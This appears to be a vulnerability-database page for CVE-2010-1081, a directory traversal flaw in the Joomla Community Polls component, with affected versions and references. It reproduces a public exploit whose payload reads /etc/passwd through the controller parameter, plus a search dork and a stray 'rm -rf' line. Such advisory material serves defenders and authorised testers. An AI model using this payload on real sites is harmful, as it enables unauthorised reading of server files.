CVE-2010-1081
Description
Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
[!]===========================================================================[!]
[~] Joomla Component com_communitypolls LFI Vulnerability
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 16 February, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://www.corejoomla.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html
[+] Version : 1.5.2 maybe lower also affected
[!]===========================================================================[!]
[ Vulnerable File ]
http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER]
[ XpL ]
../../../../../../../../../../../../../../../etc/passwd%00
[ d3m0 ]
http://server/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
etc etc etc ;]
[!]===========================================================================[!]
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] Rawk !
[+] rm -rf
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] e0f
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| corejoomla | com_communitypolls | 1.5.0 | |
| corejoomla | com_communitypolls | {"endIncluding":"1.5.2"} | |
| corejoomla | com_communitypolls | 1.0.1 | |
| corejoomla | com_communitypolls | 1.0.2 | |
| corejoomla | com_communitypolls | 1.0.3 | |
| corejoomla | com_communitypolls | 1.0.4 | |
| corejoomla | com_communitypolls | 1.0.5 | |
| corejoomla | com_communitypolls | 1.0.6 | |
| corejoomla | com_communitypolls | 1.0.7 | |
| corejoomla | com_communitypolls | 1.0.8 | |
| corejoomla | com_communitypolls | 1.0.9 | |
| corejoomla | com_communitypolls | 1.5.1 | |
| joomla | joomla\! | | |
References
- http://osvdb.org/62506
- http://packetstormsecurity.org/1002-exploits/joomlacp-lfi.txt
- http://secunia.com/advisories/38692
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
- http://www.securityfocus.com/bid/38330
- http://osvdb.org/62506
- http://packetstormsecurity.org/1002-exploits/joomlacp-lfi.txt
- http://secunia.com/advisories/38692
- http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
- http://www.securityfocus.com/bid/38330
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.